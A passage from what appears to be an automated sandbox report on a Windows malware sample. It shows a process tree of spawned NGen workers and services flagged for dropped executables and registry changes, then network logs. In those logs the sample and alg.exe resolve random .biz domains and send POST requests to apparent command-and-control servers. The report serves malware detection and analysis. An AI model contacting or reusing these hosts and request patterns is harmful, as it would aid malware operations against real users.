              PID:2960
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3a0 -InterruptEvent 3a4 -NGENProcess 35c -Pipe 38c -Comment "NGen Worker Process"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:592
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3a4 -InterruptEvent 3a8 -NGENProcess 34c -Pipe 390 -Comment "NGen Worker Process"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2492
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3a8 -InterruptEvent 3ac -NGENProcess 33c -Pipe 394 -Comment "NGen Worker Process"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2576
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 3b0 -NGENProcess 35c -Pipe 398 -Comment "NGen Worker Process"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2000
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3b0 -InterruptEvent 3b4 -NGENProcess 34c -Pipe 39c -Comment "NGen Worker Process"
              2⤵
              • Modifies data under HKEY_USERS
              PID:1976
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3b4 -InterruptEvent 3ac -NGENProcess 3b8 -Pipe 3a0 -Comment "NGen Worker Process"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:1492
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 3bc -NGENProcess 35c -Pipe 3a4 -Comment "NGen Worker Process"
              2⤵
                PID:2164
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3bc -InterruptEvent 3c0 -NGENProcess 34c -Pipe 3a8 -Comment "NGen Worker Process"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2724
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3c0 -InterruptEvent 3c4 -NGENProcess 3b8 -Pipe 3b0 -Comment "NGen Worker Process"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2264
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3c4 -InterruptEvent 3b8 -NGENProcess 3ac -Pipe 3cc -Comment "NGen Worker Process"
                2⤵
                  PID:112
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3b8 -InterruptEvent 33c -NGENProcess 3c8 -Pipe 3b4 -Comment "NGen Worker Process"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:236
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 33c -InterruptEvent 3d0 -NGENProcess 3c0 -Pipe 378 -Comment "NGen Worker Process"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2824
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3d0 -InterruptEvent 3d4 -NGENProcess 3ac -Pipe 35c -Comment "NGen Worker Process"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:3064
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3d4 -InterruptEvent 3d8 -NGENProcess 3c8 -Pipe 3bc -Comment "NGen Worker Process"
                  2⤵
                  • Modifies data under HKEY_USERS
                  PID:2424
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3d8 -InterruptEvent 3dc -NGENProcess 3c0 -Pipe 3c4 -Comment "NGen Worker Process"
                  2⤵
                  • Modifies data under HKEY_USERS
                  PID:1536
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3dc -InterruptEvent 3e0 -NGENProcess 3ac -Pipe 3b8 -Comment "NGen Worker Process"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1636
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3dc -InterruptEvent 3ac -NGENProcess 3e0 -Pipe 3e4 -Comment "NGen Worker Process"
                  2⤵
                    PID:2732
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 3e8 -NGENProcess 3c0 -Pipe 3d0 -Comment "NGen Worker Process"
                    2⤵
                      PID:2876
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3e8 -InterruptEvent 3ec -NGENProcess 33c -Pipe 3d4 -Comment "NGen Worker Process"
                      2⤵
                        PID:2972
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3ec -InterruptEvent 3f0 -NGENProcess 3e0 -Pipe 3d8 -Comment "NGen Worker Process"
                        2⤵
                          PID:2640
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3f0 -InterruptEvent 3f4 -NGENProcess 3c0 -Pipe 3c8 -Comment "NGen Worker Process"
                          2⤵
                            PID:3016
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3f4 -InterruptEvent 3f8 -NGENProcess 33c -Pipe 3dc -Comment "NGen Worker Process"
                            2⤵
                              PID:2976
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 3f8 -InterruptEvent 3fc -NGENProcess 3f0 -Pipe 3ec -Comment "NGen Worker Process"
                              2⤵
                                PID:2264
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                              1⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2700
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 1c4 -NGENProcess 1c8 -Pipe 1d4 -Comment "NGen Worker Process"
                                2⤵
                                • Executes dropped EXE
                                PID:1768
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 244 -InterruptEvent 1c4 -NGENProcess 1c8 -Pipe 1d8 -Comment "NGen Worker Process"
                                2⤵
                                • Executes dropped EXE
                                PID:800
                            • C:\Windows\ehome\ehRecvr.exe
                              C:\Windows\ehome\ehRecvr.exe
                              1⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              PID:2504
                            • C:\Windows\ehome\ehsched.exe
                              C:\Windows\ehome\ehsched.exe
                              1⤵
                              • Executes dropped EXE
                              PID:2284
                            • C:\Windows\eHome\EhTray.exe
                              "C:\Windows\eHome\EhTray.exe" /nav:-2
                              1⤵
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:568
                            • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                              "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:2592
                            • C:\Windows\system32\IEEtwCollector.exe
                              C:\Windows\system32\IEEtwCollector.exe /V
                              1⤵
                              • Executes dropped EXE
                              PID:2800
                            • C:\Windows\ehome\ehRec.exe
                              C:\Windows\ehome\ehRec.exe -Embedding
                              1⤵
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:800
                            • C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE
                              "C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE" /auditservice
                              1⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              PID:696
                            • C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                              "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                              1⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              PID:2572
                            • C:\Windows\System32\msdtc.exe
                              C:\Windows\System32\msdtc.exe
                              1⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • Drops file in Windows directory
                              PID:1776
                            • C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
                              "C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
                              1⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:1668

                            Network

                            • flag-us
                              DNS
                              pywolwnvd.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              pywolwnvd.biz
                              IN A
                              Response
                              pywolwnvd.biz
                              IN A
                              54.244.188.177
                            • flag-us
                              POST
                              http://pywolwnvd.biz/qppwmclitvbxs
                              dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
                              Remote address:
                              54.244.188.177:80
                              Request
                              POST /qppwmclitvbxs HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: pywolwnvd.biz
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Content-Length: 932
                            • flag-ru
                              GET
                              http://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba
                              dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
                              Remote address:
                              186.2.171.17:80
                              Request
                              GET /seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba HTTP/1.1
                              Connection: Keep-Alive
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
                              Accept-Language: en-US,en;q=0.9
                              Referer: https://www.facebook.com
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
                              Host: 186.2.171.17
                              Response
                              HTTP/1.1 301 Moved Permanently
                              Server: ddos-guard
                              Date: Wed, 25 Dec 2024 02:03:48 GMT
                              Connection: keep-alive
                              Keep-Alive: timeout=60
                              Set-Cookie: __ddg8_=QSAHjNl4nFPl3dKC; Domain=.171.17; Path=/; Expires=Wed, 25-Dec-2024 02:23:48 GMT
                              Set-Cookie: __ddg9_=181.215.176.83; Domain=.171.17; Path=/; Expires=Wed, 25-Dec-2024 02:23:48 GMT
                              Set-Cookie: __ddg10_=1735092228; Domain=.171.17; Path=/; Expires=Wed, 25-Dec-2024 02:23:48 GMT
                              Location: https://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 568
                            • flag-us
                              DNS
                              pywolwnvd.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              pywolwnvd.biz
                              IN A
                              Response
                              pywolwnvd.biz
                              IN A
                              54.244.188.177
                            • flag-ru
                              GET
                              https://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba
                              dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
                              Remote address:
                              186.2.171.17:443
                              Request
                              GET /seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba HTTP/1.1
                              Connection: Keep-Alive
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
                              Accept-Language: en-US,en;q=0.9
                              Referer: https://www.facebook.com
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
                              Host: 186.2.171.17
                              Response
                              HTTP/1.1 502 Bad Gateway
                              Server: ddos-guard
                              Date: Wed, 25 Dec 2024 02:03:50 GMT
                              Connection: keep-alive
                              Keep-Alive: timeout=60
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 585
                            • flag-us
                              DNS
                              ssbzmoy.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              ssbzmoy.biz
                              IN A
                              Response
                              ssbzmoy.biz
                              IN A
                              18.141.10.107
                            • flag-sg
                              POST
                              http://ssbzmoy.biz/g
                              alg.exe
                              Remote address:
                              18.141.10.107:80
                              Request
                              POST /g HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: ssbzmoy.biz
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Content-Length: 776
                              Response
                              HTTP/1.1 200 OK
                              Server: nginx
                              Date: Wed, 25 Dec 2024 02:04:29 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=13e18fd8a1cdd68cb321fbcc3e8dc82d|181.215.176.83|1735092269|1735092269|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                            • flag-us
                              DNS
                              cvgrf.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              cvgrf.biz
                              IN A
                              Response
                              cvgrf.biz
                              IN A
                              54.244.188.177
                            • flag-us
                              DNS
                              npukfztj.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              npukfztj.biz
                              IN A
                              Response
                              npukfztj.biz
                              IN A
                              44.221.84.105
                            • flag-us
                              POST
                              http://npukfztj.biz/bwkltopmnrvvwfg
                              alg.exe
                              Remote address:
                              44.221.84.105:80
                              Request
                              POST /bwkltopmnrvvwfg HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: npukfztj.biz
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Content-Length: 776
                              Response
                              HTTP/1.1 200 OK
                              Server: nginx
                              Date: Wed, 25 Dec 2024 02:05:12 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=8e8a83800d0057d5c34f6b4ea423b99e|181.215.176.83|1735092312|1735092312|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                            • flag-us
                              DNS
                              przvgke.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              przvgke.biz
                              IN A
                              Response
                              przvgke.biz
                              IN A
                              172.234.222.143
                              przvgke.biz
                              IN A
                              172.234.222.138
                            • flag-us
                              POST
                              http://przvgke.biz/ye
                              alg.exe
                              Remote address:
                              172.234.222.143:80
                              Request
                              POST /ye HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: przvgke.biz
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Content-Length: 776
                              Response
                              HTTP/1.1 302 Moved Temporarily
                              Server: openresty
                              Date: Wed, 25 Dec 2024 02:05:15 GMT
                              Content-Type: text/html
                              Content-Length: 142
                              Connection: keep-alive
                              Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                              Location: http://ww99.przvgke.biz/ye
                              Cache-Control: no-store, max-age=0
                            • flag-us
                              POST
                              http://przvgke.biz/tloyfjsdxsgslusj
                              alg.exe
                              Remote address:
                              172.234.222.143:80
                              Request
                              POST /tloyfjsdxsgslusj HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: przvgke.biz
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Content-Length: 776
                              Response
                              HTTP/1.1 302 Moved Temporarily
                              Server: openresty
                              Date: Wed, 25 Dec 2024 02:05:16 GMT
                              Content-Type: text/html
                              Content-Length: 142
                              Connection: keep-alive
                              Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                              Location: http://ww99.przvgke.biz/tloyfjsdxsgslusj
                              Cache-Control: no-store, max-age=0
                            • flag-us
                              DNS
                              ww99.przvgke.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              ww99.przvgke.biz
                              IN A
                              Response
                              ww99.przvgke.biz
                              IN A
                              72.52.179.174
                            • flag-us
                              GET
                              http://ww99.przvgke.biz/ye
                              alg.exe
                              Remote address:
                              72.52.179.174:80
                              Request
                              GET /ye HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Host: ww99.przvgke.biz
                              Response
                              HTTP/1.1 302 Moved Temporarily
                              Date: Wed, 25 Dec 2024 02:05:16 GMT
                              Content-Type: text/html
                              Content-Length: 0
                              Connection: keep-alive
                              Location: http://ww7.przvgke.biz/ye?usid=24&utid=9739925920
                              Cache-Control: no-cache
                              Pragma: no-cache
                              Access-Control-Allow-Origin: *
                            • flag-us
                              GET
                              http://ww99.przvgke.biz/tloyfjsdxsgslusj
                              alg.exe
                              Remote address:
                              72.52.179.174:80
                              Request
                              GET /tloyfjsdxsgslusj HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Host: ww99.przvgke.biz
                              Response
                              HTTP/1.1 302 Moved Temporarily
                              Date: Wed, 25 Dec 2024 02:05:16 GMT
                              Content-Type: text/html
                              Content-Length: 0
                              Connection: keep-alive
                              Location: http://ww12.przvgke.biz/tloyfjsdxsgslusj?usid=24&utid=9739926020
                              Cache-Control: no-cache
                              Pragma: no-cache
                              Access-Control-Allow-Origin: *
                            • flag-us
                              DNS
                              ww7.przvgke.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              ww7.przvgke.biz
                              IN A
                              Response
                              ww7.przvgke.biz
                              IN CNAME
                              76899.bodis.com
                              76899.bodis.com
                              IN A
                              199.59.243.227
                            • flag-us
                              GET
                              http://ww7.przvgke.biz/ye?usid=24&utid=9739925920
                              alg.exe
                              Remote address:
                              199.59.243.227:80
                              Request
                              GET /ye?usid=24&utid=9739925920 HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Host: ww7.przvgke.biz
                              Response
                              HTTP/1.1 200 OK
                              date: Wed, 25 Dec 2024 02:05:16 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 1130
                              x-request-id: 3853e633-86a7-42d8-89b1-25d8d9b17e75
                              cache-control: no-store, max-age=0
                              accept-ch: sec-ch-prefers-color-scheme
                              critical-ch: sec-ch-prefers-color-scheme
                              vary: sec-ch-prefers-color-scheme
                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vDwtkTrHiBuc++9nCFEFKA7iuNQLByHpA+wdsnlsp70UN3aOayn/XvvYV0dP8ki1qhl1vBt3ibCg4j936/Ncvw==
                              set-cookie: parking_session=3853e633-86a7-42d8-89b1-25d8d9b17e75; expires=Wed, 25 Dec 2024 02:20:16 GMT; path=/
                            • flag-us
                              DNS
                              ww12.przvgke.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              ww12.przvgke.biz
                              IN A
                              Response
                              ww12.przvgke.biz
                              IN CNAME
                              084725.parkingcrew.net
                              084725.parkingcrew.net
                              IN A
                              76.223.26.96
                              084725.parkingcrew.net
                              IN A
                              13.248.148.254
                            • flag-us
                              GET
                              http://ww12.przvgke.biz/tloyfjsdxsgslusj?usid=24&utid=9739926020
                              alg.exe
                              Remote address:
                              76.223.26.96:80
                              Request
                              GET /tloyfjsdxsgslusj?usid=24&utid=9739926020 HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Host: ww12.przvgke.biz
                              Response
                              HTTP/1.1 200 OK
                              Accept-Ch: viewport-width
                              Accept-Ch: dpr
                              Accept-Ch: device-memory
                              Accept-Ch: rtt
                              Accept-Ch: downlink
                              Accept-Ch: ect
                              Accept-Ch: ua
                              Accept-Ch: ua-full-version
                              Accept-Ch: ua-platform
                              Accept-Ch: ua-platform-version
                              Accept-Ch: ua-arch
                              Accept-Ch: ua-model
                              Accept-Ch: ua-mobile
                              Accept-Ch-Lifetime: 30
                              Content-Type: text/html; charset=UTF-8
                              Date: Wed, 25 Dec 2024 02:05:17 GMT
                              Server: Caddy
                              Server: nginx
                              Vary: Accept-Encoding
                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_SEVcTO7aRxFtSwdoptOjKndGd8cxe3TY8RePnTlGQ70cDNZYPiYAfnf/gQnEPdnIbneh+Rl2+W8Qf5kswIVAGQ==
                              X-Buckets: bucket003
                              X-Domain: przvgke.biz
                              X-Language: english
                              X-Pcrew-Blocked-Reason: hosting network
                              X-Pcrew-Ip-Organization: Cogent Communications
                              X-Subdomain: ww12
                              X-Template: tpl_CleanPeppermintBlack_twoclick
                              Transfer-Encoding: chunked
                            • flag-us
                              DNS
                              zlenh.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              zlenh.biz
                              IN A
                              Response
                            • flag-us
                              DNS
                              knjghuig.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              knjghuig.biz
                              IN A
                              Response
                              knjghuig.biz
                              IN A
                              18.141.10.107
                            • flag-sg
                              POST
                              http://knjghuig.biz/eovjrsnxfvivsmj
                              alg.exe
                              Remote address:
                              18.141.10.107:80
                              Request
                              POST /eovjrsnxfvivsmj HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: knjghuig.biz
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                              Content-Length: 776
                              Response
                              HTTP/1.1 200 OK
                              Server: nginx
                              Date: Wed, 25 Dec 2024 02:05:17 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=43876e65d76ed96c1e5e235640031d88|181.215.176.83|1735092317|1735092317|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                            • flag-us
                              DNS
                              uhxqin.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              uhxqin.biz
                              IN A
                              Response
                            • flag-us
                              DNS
                              anpmnmxo.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              anpmnmxo.biz
                              IN A
                              Response
                            • flag-us
                              DNS
                              lpuegx.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              lpuegx.biz
                              IN A
                              Response
                              lpuegx.biz
                              IN A
                              82.112.184.197
                            • flag-us
                              DNS
                              vjaxhpbji.biz
                              alg.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              vjaxhpbji.biz
                              IN A
                              Response
                              vjaxhpbji.biz
                              IN A
                              82.112.184.197
                            • 54.244.188.177:80
                              http://pywolwnvd.biz/qppwmclitvbxs
                              http
                              dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
                              6.9kB
                              260 B
                              14
                              5

                              HTTP Request

                              POST http://pywolwnvd.biz/qppwmclitvbxs
                            • 186.2.171.17:80
                              http://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba
                              http
                              dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
                              803 B
                              2.5kB
                              7
                              4

                              HTTP Request

                              GET http://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba

                              HTTP Response

                              301
                            • 54.244.188.177:80
                              pywolwnvd.biz
                              alg.exe
                              152 B
                              3
                            • 186.2.171.17:443
                              https://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba
                              tls, http
                              dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
                              1.1kB
                              2.3kB
                              8
                              6

                              HTTP Request

                              GET https://186.2.171.17/seemorebty/il.php?e=dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba

                              HTTP Response

                              502
                            • 54.244.188.177:80
                              pywolwnvd.biz
                              alg.exe
                              144 B
                              3
                            • 18.141.10.107:80
                              http://ssbzmoy.biz/g
